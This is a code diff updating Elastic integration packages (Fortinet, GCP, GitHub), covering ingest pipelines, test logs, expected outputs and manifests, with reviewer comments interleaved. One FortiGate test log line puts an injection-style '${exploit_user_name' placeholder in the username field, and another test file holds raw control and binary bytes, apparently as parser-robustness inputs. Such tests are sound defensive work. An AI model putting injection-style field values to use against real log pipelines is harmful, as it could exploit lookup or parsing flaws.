subtype=\\\"webfilter\\\" eventtype=\\\"ftgd_blk\\\" level=\\\"warning\\\" vd=\\\"root\\\" eventtime=1587230269052907555 tz=\\\"-0500\\\" policyid=100602 sessionid=1234 user=\\\"elasticuser\\\" group=\\\"elasticgroup\\\" authserver=\\\"elasticauth\\\" srcip=192.168.2.1 srcport=61930 srcintf=\\\"port1\\\" srcintfrole=\\\"lan\\\" dstip=67.43.156.13 dstport=443 dstintf=\\\"wan1\\\" dstintfrole=\\\"wan\\\" proto=6 service=\\\"HTTPS\\\" hostname=\\\"elastic.co\\\" profile=\\\"elasticruleset\\\" action=\\\"blocked\\\" reqtype=\\\"direct\\\" url=\\\"/config/\\\" sentbyte=1152 rcvdbyte=1130 direction=\\\"outgoing\\\" msg=\\\"URL belongs to a denied category in policy\\\" method=\\\"domain\\\" cat=76 catdesc=\\\"Internet Telephony\\\"\"}" + } + } + ] +} 
diff --git a/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-json.json-expected.json b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-json.json-expected.json new file mode 100644 index 00000000000..f52dfc32f4d --- /dev/null +++ b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-json.json-expected.json 
@@ -0,0 +1,126 @@ +{ + "expected": [ + { + "@timestamp": "2020-04-23T12:17:48.000-05:00", + "destination": { + "as": { + "number": 35908 + }, + "bytes": 1130, + "geo": { + "continent_name": "Asia", + "country_iso_code": "BT", + "country_name": "Bhutan", + "location": { + "lat": 27.5, + "lon": 90.5 + } + }, + "ip": "67.43.156.13", + "port": 443 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "ftgd_blk", + "category": [ + "network" + ], + "code": "0316013056", + "kind": "event", + "original": "<188>date=2020-04-23 time=12:17:48 devname=\"testswitch1\" devid=\"somerouterid\" logid=\"0316013056\" type=\"utm\" subtype=\"webfilter\" eventtype=\"ftgd_blk\" level=\"warning\" vd=\"root\" eventtime=1587230269052907555 tz=\"-0500\" policyid=100602 sessionid=1234 user=\"elasticuser\" group=\"elasticgroup\" authserver=\"elasticauth\" srcip=192.168.2.1 srcport=61930 srcintf=\"port1\" srcintfrole=\"lan\" dstip=67.43.156.13 dstport=443 dstintf=\"wan1\" dstintfrole=\"wan\" proto=6 service=\"HTTPS\" hostname=\"elastic.co\" profile=\"elasticruleset\" action=\"blocked\" reqtype=\"direct\" url=\"/config/\" sentbyte=1152 rcvdbyte=1130 direction=\"outgoing\" msg=\"URL belongs to a denied category in policy\" method=\"domain\" cat=76 catdesc=\"Internet Telephony\"", + "outcome": "success", + "start": "2020-04-18T12:17:49.052-05:00", + "timezone": "-0500", + "type": [ + "denied" + ] + }, + "fortinet": { + "firewall": { + "action": "blocked", + "authserver": "elasticauth", + "cat": "76", + "dstintfrole": "wan", + "method": "domain", + "reqtype": "direct", + "sessionid": "1234", + "srcintfrole": "lan", + "subtype": "webfilter", + "type": "utm", + "vd": "root" + } + }, + "log": { + "level": "warning", + "syslog": { + "facility": { + "code": 23 + }, + "priority": 188, + "severity": { + "code": 4 + } + } + }, + "message": "URL belongs to a denied category in policy", + "network": { + "bytes": 2282, + "direction": "outbound", + "iana_number": "6", + "protocol": "https", + 
"transport": "tcp" + }, + "observer": { + "egress": { + "interface": { + "name": "wan1" + } + }, + "ingress": { + "interface": { + "name": "port1" + } + }, + "name": "testswitch1", + "product": "Fortigate", + "serial_number": "somerouterid", + "type": "firewall", + "vendor": "Fortinet" + }, + "related": { + "ip": [ + "192.168.2.1", + "67.43.156.13" + ], + "user": [ + "elasticuser" + ] + }, + "rule": { + "category": "Internet Telephony", + "id": "100602", + "ruleset": "elasticruleset" + }, + "source": { + "bytes": 1152, + "ip": "192.168.2.1", + "port": 61930, + "user": { + "group": { + "name": "elasticgroup" + }, + "name": "elasticuser" + } + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "elastic.co", + "path": "/config/" + } + } + ] +} \ No newline at end of file diff --git a/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-unsanitized.log b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-unsanitized.log new file mode 100644 index 00000000000..93ddb4826ff Binary files /dev/null and b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-unsanitized.log differ diff --git a/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-unsanitized.log-expected.json b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-unsanitized.log-expected.json new file mode 100644 index 00000000000..7c9e00f6cf7 --- /dev/null +++ b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet-unsanitized.log-expected.json 
@@ -0,0 +1,214 @@ +{ + "expected": [ + { + "@timestamp": "2024-03-15T22:12:57.000-07:00", + "destination": { + "bytes": 1140, + "ip": "172.16.200.99", + "packets": 15, + "port": 123 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "accept", + "category": [ + "network" + ], + "code": "0000000013", + "duration": 294000000000, + "kind": "event", + "original": "date=2024-03-15 time=22:12:57 devname=\"foo\" devid=\"bar\" eventtime=1710565976971231921 tz=\"-0700\" logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"root\" srcip=10.1.100.66 srcport=123 srcintf=\"srv1\" srcintfrole=\"lan\" dstip=172.16.200.99 dstport=123 dstintf=\"port13\" dstintfrole=\"wan\" srccountry=\"Reserved\" dstcountry=\"United States\" sessionid=40433307 proto=17 action=\"accept\" policyid=26 policytype=\"policy\" poluuid=\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\" policyname=\"pol1\" service=\"NTP\" trandisp=\"snat\" transip=10.1.100.11 transport=60540 duration=294 sentbyte=1140 rcvdbyte=1140 sentpkt=15 rcvdpkt=15 appcat=\"unscanned\" srchwvendor=\"Baz\" devtype=\"Router\" mastersrcmac=\"ff:f0:ff:ff:2e:07\" srcmac=\"ff:ff:ff:1b:ff:07\" srcserver=0 \u0004��\u0000 \u0000D\f<\u0000\u0000\u0000$\u0000\u0000\u0000\u0015e��\u0001\u0000\u0000\u0000=���\u0001\u0000\u0000\u0000��������", + "outcome": "success", + "start": "2024-03-15T22:12:56.971-07:00", + "timezone": "-0700", + "type": [ + "connection", + "end", + "allowed" + ] + }, + "fortinet": { + "firewall": { + "action": "accept", + "devtype": "Router", + "dstcountry": "United States", + "dstintfrole": "wan", + "mastersrcmac": "ff:f0:ff:ff:2e:07", + "sessionid": "40433307", + "srccountry": "Reserved", + "srchwvendor": "Baz", + "srcintfrole": "lan", + "srcserver": "0", + "subtype": "forward", + "trandisp": "snat", + "transip": "10.1.100.11", + "type": "traffic", + "vd": "root" + } + }, + "log": { + "level": "notice" + }, + "network": { + "bytes": 2280, + "direction": "internal", + "iana_number": "17", + 
"packets": 30, + "protocol": "ntp", + "transport": "udp" + }, + "observer": { + "egress": { + "interface": { + "name": "port13" + } + }, + "ingress": { + "interface": { + "name": "srv1" + } + }, + "name": "foo", + "product": "Fortigate", + "serial_number": "bar", + "type": "firewall", + "vendor": "Fortinet" + }, + "related": { + "ip": [ + "10.1.100.66", + "172.16.200.99", + "10.1.100.11" + ] + }, + "rule": { + "category": "unscanned", + "id": "26", + "name": "pol1", + "ruleset": "policy", + "uuid": "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa" + }, + "source": { + "bytes": 1140, + "ip": "10.1.100.66", + "mac": "FF-FF-FF-1B-FF-07", + "nat": { + "ip": "10.1.100.11", + "port": 60540 + }, + "packets": 15, + "port": 123 + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-03-16T10:16:59.000-07:00", + "destination": { + "bytes": 76, + "ip": "172.16.200.99", + "packets": 1, + "port": 123 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "accept", + "category": [ + "network" + ], + "code": "0000000013", + "duration": 180000000000, + "kind": "event", + "original": "date=2024-03-16 time=10:16:59 devname=\"foo\" devid=\"bar\" eventtime=1710609419481230122 tz=\"-0700\" logid=\"0000000013\" type=\"traffic\" subtype=\"forward\" level=\"notice\" vd=\"root\" srcip=10.1.100.66 srcport=59475 srcintf=\"srv1\" srcintfrole=\"lan\" dstip=172.16.200.99 dstport=123 dstintf=\"port13\" dstintfrole=\"wan\" srccountry=\"Reserved\" dstcountry=\"United States\" sessionid=40469528 proto=17 action=\"accept\" policyid=20 policytype=\"policy\" poluuid=\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\" policyname=\"pol2\" service=\"NTP\" trandisp=\"snat\" transip=10.1.100.11 transport=59475 duration=180 sentbyte=76 rcvdbyte=76 sentpkt=1 rcvdpkt=1 appcat=\"unscanned\" srchwvendor=\"Baz\" devtype=\"Router\" mastersrcmac=\"ff:f0:04:ff:ff:07\" srcmac=\"ff:f0:04:ff:ff:07\" srcserver=0 \u0004��\u0000 
\u0000D\f<\u0000\u0000\u0000$\u0000\u0000\u0000=���\u0001\u0000\u0000\u0000E���\u0001\u0000\u0000\u0000��������", + "outcome": "success", + "start": "2024-03-16T10:16:59.481-07:00", + "timezone": "-0700", + "type": [ + "connection", + "end", + "allowed" + ] + }, + "fortinet": { + "firewall": { + "action": "accept", + "devtype": "Router", + "dstcountry": "United States", + "dstintfrole": "wan", + "mastersrcmac": "ff:f0:04:ff:ff:07", + "sessionid": "40469528", + "srccountry": "Reserved", + "srchwvendor": "Baz", + "srcintfrole": "lan", + "srcserver": "0", + "subtype": "forward", + "trandisp": "snat", + "transip": "10.1.100.11", + "type": "traffic", + "vd": "root" + } + }, + "log": { + "level": "notice" + }, + "network": { + "bytes": 152, + "direction": "internal", + "iana_number": "17", + "packets": 2, + "protocol": "ntp", + "transport": "udp" + }, + "observer": { + "egress": { + "interface": { + "name": "port13" + } + }, + "ingress": { + "interface": { + "name": "srv1" + } + }, + "name": "foo", + "product": "Fortigate", + "serial_number": "bar", + "type": "firewall", + "vendor": "Fortinet" + }, + "related": { + "ip": [ + "10.1.100.66", + "172.16.200.99", + "10.1.100.11" + ] + }, + "rule": { + "category": "unscanned", + "id": "20", + "name": "pol2", + "ruleset": "policy", + "uuid": "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa" + }, + "source": { + "bytes": 76, + "ip": "10.1.100.66", + "mac": "FF-F0-04-FF-FF-07", + "nat": { + "ip": "10.1.100.11", + "port": 59475 + }, + "packets": 1, + "port": 59475 + }, + "tags": [ + "preserve_original_event" + ] + } + ] +} \ No newline at end of file diff --git a/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet.log b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet.log index 7b214be1f9f..4bb19570088 100644 --- a/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet.log +++ b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet.log 
@@ -50,4 +50,5 @@ date= desc="Object update request from device of FortiClient received" msg="Send <190>date=2023-12-13 time=07:56:14 tz="+0200" devname=firewallhost01 device_id=FMG123TZ13111111 log_id=0001010018 type=event subtype=system pri=information desc="User login/logout successful" user="philipp" userfrom="JSON(192.168.0.10)" msg="user 'philipp' with profile 'Super_User' login accepted from JSON(192.168.0.10)" session_id=12345 adminprof="Super_User" <185>date=2023-12-13 time=03:33:34 tz="+0200" devname=firewallhost01 device_id=FMG123TZ13111111 log_id=0001010014 type=event subtype=system pri=alert desc="User login from SSH failed" user="philipp" msg="Login from ssh: Failed for philipp from 192.168.0.10 port 38654" remote_ip="192.168.0.10" remote_port=38654 valid=1 authmsg="Failed" extrainfo="" <185>eventtime=1702257752722386015 tz="+0100" logid="0100032002" type="event" subtype="system" level="alert" vd="root" logdesc="Admin login failed" sn="0" user="philipp" ui="ssh(192.168.0.10)" method="ssh" srcip=192.168.0.10 dstip=10.123.26.241 action="login" status="failed" reason="ssh_key_invalid" msg="Administrator philipp login failed from ssh(192.168.0.10) because of invalid ssh key" -<185>eventtime=1702329825833960934 tz="+0100" logid="0100032002" type="event" subtype="system" level="alert" vd="root" logdesc="Admin login failed" sn="0" user="${exploit_user_name" ui="ssh(192.168.0.10)" method="ssh" srcip=192.168.0.10 dstip=10.123.26.240 action="login" status="failed" reason="passwd_invalid" msg="Administrator ${exploit_user_name login failed from ssh(192.168.0.10) because of invalid password" \ No newline at end of file +<185>eventtime=1702329825833960934 tz="+0100" logid="0100032002" type="event" subtype="system" level="alert" vd="root" logdesc="Admin login failed" sn="0" user="${exploit_user_name" ui="ssh(192.168.0.10)" method="ssh" srcip=192.168.0.10 dstip=10.123.26.240 action="login" status="failed" reason="passwd_invalid" msg="Administrator 
${exploit_user_name login failed from ssh(192.168.0.10) because of invalid password" +<185>date=2024-02-26 time=11:10:55 devname="FW-INT_01_01" devid="FG1K5DKKKKKK" eventtime=1708942255551034463 tz="+0100" logid="0100032002" type="event" subtype="system" level="alert" vd="Int" logdesc="Admin login failed" sn="0" user="name.lastname" ui="https(192.168.1.1)" method="https" srcip=192.168.1.1 dstip=10.10.10.10 action="login" status="failed" reason="passwd_invalid" msg="Administrator name.lastname login failed from https(192.168.1.1) because of invalid password" \ No newline at end of file diff --git a/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet.log-expected.json b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet.log-expected.json index fb3336e13e5..5f470708c5a 100644 --- a/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet.log-expected.json +++ b/packages/fortinet_fortigate/data_stream/log/_dev/test/pipeline/test-fortinet.log-expected.json 
@@ -4605,6 +4605,94 @@ "Administrator" ] } + }, + { + "@timestamp": "2024-02-26T11:10:55.000+01:00", + "_tmp": { + "user": {} + }, + "destination": { + "ip": "10.10.10.10" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "login", + "category": [ + "authentication" + ], + "code": "0100032002", + "kind": "event", + "original": "<185>date=2024-02-26 time=11:10:55 devname=\"FW-INT_01_01\" devid=\"FG1K5DKKKKKK\" eventtime=1708942255551034463 tz=\"+0100\" logid=\"0100032002\" type=\"event\" subtype=\"system\" level=\"alert\" vd=\"Int\" logdesc=\"Admin login failed\" sn=\"0\" user=\"name.lastname\" ui=\"https(192.168.1.1)\" method=\"https\" srcip=192.168.1.1 dstip=10.10.10.10 action=\"login\" status=\"failed\" reason=\"passwd_invalid\" msg=\"Administrator name.lastname login failed from https(192.168.1.1) because of invalid password\"", + "outcome": "failure", + "reason": "passwd_invalid", + "start": "2024-02-26T11:10:55.551+01:00", + "timezone": "+0100" + }, + "fortinet": { + "firewall": { + "action": "login", + "method": "https", + "sn": "0", + "subtype": "system", + "type": "event", + "vd": "Int" + } + }, + "log": { + "level": "alert", + "syslog": { + "facility": { + "code": 23 + }, + "priority": 185, + "severity": { + "code": 1 + } + } + }, + "message": "Administrator name.lastname login failed from https(192.168.1.1) because of invalid password", + "network": { + "direction": "internal" + }, + "observer": { + "name": "FW-INT_01_01", + "product": "Fortigate", + "serial_number": "FG1K5DKKKKKK", + "type": "firewall", + "vendor": "Fortinet" + }, + "related": { + "ip": [ + "192.168.1.1", + "10.10.10.10" + ], + "user": [ + "name.lastname" + ] + }, + "rule": { + "description": "Admin login failed" + }, + "source": { + "ip": "192.168.1.1", + "user": { + "name": "name.lastname", + "roles": [ + "Administrator" + ] + } + }, + "tags": [ + "preserve_original_event" + ], + "user": { + "name": "name.lastname", + "roles": [ + "Administrator" + ] + } } ] } \ No 
newline at end of file
diff --git a/packages/fortinet_fortigate/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/fortinet_fortigate/data_stream/log/elasticsearch/ingest_pipeline/default.yml
index 0f4aff06dcd..6d9f800a2ae 100644
--- a/packages/fortinet_fortigate/data_stream/log/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/fortinet_fortigate/data_stream/log/elasticsearch/ingest_pipeline/default.yml
@@ -4,11 +4,11 @@ processors:
 - set:
 field: ecs.version
 value: '8.11.0'
- - rename:
+ - set:
+ field: event.original
+ copy_from: message
+ - remove:
 field: message
- target_field: event.original
- ignore_missing: true
- if: ctx.event?.original == null
 - grok:
 field: event.original
 ecs_compatibility: v1
@@ -28,7 +28,7 @@ processors:
 }
 - gsub:
 field: syslog5424_sd
- pattern: "\u0000"
+ pattern: "[\u0000-\u001F\u007F]"
 replacement: ""
 - script:
 lang: painless
@@ -80,7 +80,9 @@ processors:
 source: |
 def fw = ctx.fortinet?.firewall;
 if (fw != null) {
- fw.entrySet().removeIf(entry -> entry.getValue() == "N/A");
+ // We will remove any keys that are non-words to avoid polluting documents
+ def pat = /\W+/;
+ fw.entrySet().removeIf(entry -> entry.getValue() == "N/A" || pat.matcher(entry.getKey()).find());
 }
 - set:
 field: observer.vendor
diff --git a/packages/fortinet_fortigate/data_stream/log/elasticsearch/ingest_pipeline/login.yml b/packages/fortinet_fortigate/data_stream/log/elasticsearch/ingest_pipeline/login.yml
index d0632356458..10bb0a6d68a 100644
--- a/packages/fortinet_fortigate/data_stream/log/elasticsearch/ingest_pipeline/login.yml
+++ b/packages/fortinet_fortigate/data_stream/log/elasticsearch/ingest_pipeline/login.yml
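Review bot: The new `set`/`remove` pair in hunk `@@ -4,11 +4,11 @@` drops both guards the replaced `rename` carried (`ignore_missing: true` and `if: ctx.event?.original == null`), so a document that reaches this pipeline without a `message` field now fails at `copy_from: message` and again at `remove`, and a pre-populated `event.original` is silently overwritten. If overwriting is the intent (the changelog entry says `event.original` must match `message`), keep the missing-field tolerance by adding `ignore_empty_value: true` to the `set` and `ignore_missing: true` to the `remove`. In hunk `@@ -28,7 +28,7 @@` the widened pattern `[\u0000-\u001F\u007F]` also strips tabs and newlines from `syslog5424_sd`, which is presumably intended as sanitization of untrusted log content; a one-line comment above `gsub` saying that whitespace control characters are deliberately removed too would save the next reader from reading it as a bug. The processors list starts and ends outside these hunks.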
@@ -57,7 +57,7 @@ processors: - dissect: field: "message" tag: "ssh login 2" - pattern: "%{_tmp.user.roles} %{user.name} login %{event.outcome} from ssh(%{source.ip}) %{}" + pattern: "%{_tmp.user.roles} %{user.name} login %{event.outcome} from %{}(%{source.ip}) %{}" if: "ctx.message != null && ctx.message.startsWith('Administrator')" on_failure: - append: diff --git a/packages/fortinet_fortigate/manifest.yml b/packages/fortinet_fortigate/manifest.yml index 5a524fa8274..924b0a6f447 100644 --- a/packages/fortinet_fortigate/manifest.yml +++ b/packages/fortinet_fortigate/manifest.yml @@ -1,9 +1,9 @@ name: fortinet_fortigate title: Fortinet FortiGate Firewall Logs -version: 1.23.2 +version: "1.25.2" description: Collect logs from Fortinet FortiGate firewalls with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: ["security", "network", "firewall_security"] conditions: kibana: diff --git a/packages/fortinet_fortimail/changelog.yml b/packages/fortinet_fortimail/changelog.yml index 6034ef27d02..66ed2b27725 100644 --- a/packages/fortinet_fortimail/changelog.yml +++ b/packages/fortinet_fortimail/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.13.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "2.12.2" changes: - description: Changed owners diff --git a/packages/fortinet_fortimail/manifest.yml b/packages/fortinet_fortimail/manifest.yml index 9d3d83f533c..c2d58416ab3 100644 --- a/packages/fortinet_fortimail/manifest.yml +++ b/packages/fortinet_fortimail/manifest.yml @@ -1,9 +1,9 @@ name: fortinet_fortimail title: Fortinet FortiMail -version: "2.12.2" +version: "2.13.0" description: Collect logs from Fortinet FortiMail instances with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.3" categories: ["security", "email_security"] conditions: kibana: 
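Review bot: The dissect pattern in the login.yml hunk now matches any `<method>(<ip>)` form rather than only `ssh(...)`, but the processor still carries `tag: "ssh login 2"`, which will mislead anyone reading the `error.message` its `on_failure` branch appends; rename it, e.g. `tag: "admin login 2"`. The method is discarded by `%{}`, which is fine provided `fortinet.firewall.method` is already populated from the kv `method=` field, as the expected-output document at the top of this diff suggests. The processor list continues outside the hunk, so any sibling dissect that still hard-codes `ssh(` is not visible here.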
diff --git a/packages/fortinet_fortimanager/changelog.yml b/packages/fortinet_fortimanager/changelog.yml index d1cdc986ea1..2cdef872fb9 100644 --- a/packages/fortinet_fortimanager/changelog.yml +++ b/packages/fortinet_fortimanager/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.11.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 - version: "2.10.2" changes: - description: Changed owners diff --git a/packages/fortinet_fortimanager/manifest.yml b/packages/fortinet_fortimanager/manifest.yml index 6dbb6652d01..4f560ab4f96 100644 --- a/packages/fortinet_fortimanager/manifest.yml +++ b/packages/fortinet_fortimanager/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: fortinet_fortimanager title: Fortinet FortiManager Logs -version: "2.10.2" +version: "2.11.0" description: Collect logs from Fortinet FortiManager instances with Elastic Agent. type: integration categories: ["security", "network", "firewall_security"] diff --git a/packages/gcp/changelog.yml b/packages/gcp/changelog.yml index 3570ed8b25e..6f91667ef12 100644 --- a/packages/gcp/changelog.yml +++ b/packages/gcp/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "2.33.2" + changes: + - description: Add tags and processors to GCP Storage + type: enhancement + link: https://github.com/elastic/integrations/pull/9252 - version: "2.33.1" changes: - description: Update Legacy metric visualization to new metric in GCP Billing overview dashboard. diff --git a/packages/gcp/data_stream/storage/agent/stream/stream.yml.hbs b/packages/gcp/data_stream/storage/agent/stream/stream.yml.hbs index 96f1e9e46ac..6cc590123e2 100644 --- a/packages/gcp/data_stream/storage/agent/stream/stream.yml.hbs +++ b/packages/gcp/data_stream/storage/agent/stream/stream.yml.hbs 
@@ -20,6 +20,16 @@ regions: {{/each}} {{/if}} exclude_labels: {{exclude_labels}} +{{#if processors.length}} +processors: +{{processors}} +{{/if}} +{{#if tags.length}} +tags: +{{#each tags as |tag|}} +- {{tag}} +{{/each}} +{{/if}} metrics: - service: storage metric_types: diff --git a/packages/gcp/data_stream/storage/manifest.yml b/packages/gcp/data_stream/storage/manifest.yml index 4299bb640aa..474a4038ca9 100644 --- a/packages/gcp/data_stream/storage/manifest.yml +++ b/packages/gcp/data_stream/storage/manifest.yml @@ -37,5 +37,22 @@ streams: multi: false required: false show_user: true + - name: tags + type: text + title: Tags + description: Tags to include in the published event + multi: true + required: false + show_user: false + default: + - gcp-storage + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/fleet/current/elastic-agent-processor-configuration.html) for details. elasticsearch: index_mode: "time_series" diff --git a/packages/gcp/manifest.yml b/packages/gcp/manifest.yml index f171c04e6fa..d76479248ae 100644 --- a/packages/gcp/manifest.yml +++ b/packages/gcp/manifest.yml @@ -1,6 +1,6 @@ name: gcp title: Google Cloud Platform -version: "2.33.1" +version: "2.33.2" description: Collect logs and metrics from Google Cloud Platform with Elastic Agent. type: integration icons: diff --git a/packages/gcp_pubsub/changelog.yml b/packages/gcp_pubsub/changelog.yml index 9403f90577c..7e6d1e9e4d8 100644 --- a/packages/gcp_pubsub/changelog.yml +++ b/packages/gcp_pubsub/changelog.yml 
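Review bot: The `processors` description added to the storage `manifest.yml` hunk says the processors run "before the logs are parsed", but this data stream ships metrics (`metrics: - service: storage` in the stream template, `index_mode: "time_series"` directly below), so that sentence is wrong for this stream; suggest `This executes in the agent before the metrics are sent. See [Processors](https://www.elastic.co/guide/en/fleet/current/elastic-agent-processor-configuration.html) for details.` The `{{processors}}` block in `stream.yml.hbs` is emitted at top level next to `tags:`, which matches the other keys in that template, and the default tag `gcp-storage` is harmless.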
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.13.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 - version: "1.12.1" changes: - description: Changed owners diff --git a/packages/gcp_pubsub/data_stream/generic/manifest.yml b/packages/gcp_pubsub/data_stream/generic/manifest.yml index d72cf3a1249..2ceae87e780 100644 --- a/packages/gcp_pubsub/data_stream/generic/manifest.yml +++ b/packages/gcp_pubsub/data_stream/generic/manifest.yml @@ -44,12 +44,13 @@ streams: show_user: true description: Path to a JSON file containing the credentials and key used to subscribe. - name: credentials_json - type: text + type: password title: Credentials JSON multi: false required: false show_user: true description: JSON blob containing the credentials and key used to subscribe. + secret: true - name: subscription_create type: bool title: Subscription Create diff --git a/packages/gcp_pubsub/manifest.yml b/packages/gcp_pubsub/manifest.yml index 4c154e4acbb..b17182026a3 100644 --- a/packages/gcp_pubsub/manifest.yml +++ b/packages/gcp_pubsub/manifest.yml @@ -1,6 +1,6 @@ name: gcp_pubsub title: Custom Google Pub/Sub Logs -version: "1.12.1" +version: "1.13.0" description: Collect Logs from Google Pub/Sub topics type: integration icons: @@ -8,14 +8,14 @@ icons: title: logo gcp size: 32x32 type: image/svg+xml -format_version: "3.0.0" +format_version: "3.0.2" categories: - observability - google_cloud - custom conditions: kibana: - version: ^7.16.0 || ^8.0.0 + version: ^8.12.0 policy_templates: - name: gcp title: Custom Google Pub/Sub Logs diff --git a/packages/github/changelog.yml b/packages/github/changelog.yml index ce04ccb6cb1..cedc2bfec30 100644 --- a/packages/github/changelog.yml +++ b/packages/github/changelog.yml 
@@ -1,4 +1,14 @@ # newer versions go on top +- version: "1.28.0" + changes: + - description: Set sensitive values as secret and fix incorrect mappings. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 +- version: "1.27.3" + changes: + - description: Clean up null handling, formatting + type: bugfix + link: https://github.com/elastic/integrations/pull/9181 - version: "1.27.2" changes: - description: Changed owners diff --git a/packages/github/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/github/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 806d54f5260..37092428c1b 100644 --- a/packages/github/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/github/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -20,6 +20,9 @@ processors: - json: field: event.original target_field: json + - fail: + if: "!(ctx.json instanceof Map)" + message: Missing JSON object - fingerprint: fields: - json._document_id @@ -31,7 +34,7 @@ processors: - UNIX_MS timezone: UTC target_field: "@timestamp" - if: ctx.json?.created_at != null + if: ctx.json.created_at != null - date: field: json.@timestamp formats: @@ -99,7 +102,7 @@ processors: field: user.target.group.name copy_from: github.team ignore_empty_value: true - if: ctx.event?.action.startsWith("team.") && ctx.user?.target?.name != null + if: ctx.event?.action?.startsWith("team.") == true && ctx.user?.target?.name != null - set: field: group.name copy_from: github.org @@ -109,7 +112,7 @@ processors: field: user.target.group.name copy_from: github.org ignore_empty_value: true - if: ctx.event?.action.startsWith("org.") && ctx.user?.target?.name != null + if: ctx.event?.action?.startsWith("org.") == true && ctx.user?.target?.name != null - rename: field: json.data.old_user target_field: user.target.group.name 
@@ -128,7 +131,7 @@ processors: target_field: github.actor_ip type: ip ignore_missing: true - if: ctx.json?.actor_ip != null && ctx.json.actor_ip != '' + if: ctx.json.actor_ip != null && ctx.json.actor_ip != '' on_failure: - append: field: error.message @@ -188,15 +191,15 @@ processors: - append: field: event.type value: creation - if: 'ctx._temp?.action.contains("create") || ctx._temp?.action.contains("add")' + if: ctx._temp?.action?.contains("create") == true || ctx._temp?.action?.contains("add") == true - append: field: event.type value: deletion - if: 'ctx._temp?.action.contains("delete") || ctx._temp?.action.contains("remove")' + if: ctx._temp?.action?.contains("delete") == true || ctx._temp?.action?.contains("remove") == true - append: field: event.type value: change - if: 'ctx.event?.type == null || ctx.event?.type.size() == 0' + if: ctx.event?.type == null || ctx.event.type.size() == 0 - remove: field: - json @@ -204,7 +207,7 @@ processors: ignore_missing: true - remove: field: event.original - if: "ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: ctx.tags?.contains('preserve_original_event') != true ignore_failure: true ignore_missing: true - script: diff --git a/packages/github/data_stream/audit/manifest.yml b/packages/github/data_stream/audit/manifest.yml index 8049dc51946..e4f5ccd4102 100644 --- a/packages/github/data_stream/audit/manifest.yml +++ b/packages/github/data_stream/audit/manifest.yml @@ -4,12 +4,13 @@ streams: - input: httpjson vars: - name: access_token - type: text + type: password title: Personal Access Token description: the GitHub Personal Access Token. Requires `read:audit_log` scope multi: false required: true show_user: true + secret: true - name: organization type: text title: Organization Name diff --git a/packages/github/data_stream/audit/sample_event.json b/packages/github/data_stream/audit/sample_event.json index 6c158fc2748..99f6ad6593b 100644 --- a/packages/github/data_stream/audit/sample_event.json 
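Review bot: `secret: true` on `access_token` in the audit `manifest.yml` hunk (and the identical change to the code_scanning and dependabot manifests further down in this diff) only validates if the package's `format_version` and `conditions.kibana.version` are raised to a spec that knows the `secret` key; the `gcp_pubsub` manifest in this same diff moves to `format_version: "3.0.2"` and `version: ^8.12.0` for the same change, but `packages/github/manifest.yml` is not in this view, so please confirm it gets the equivalent bump. Consider also telling the user in the description that the token is stored as a Fleet secret and is not displayed again after saving, e.g. append `Stored as a secret; it cannot be read back from the policy.`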
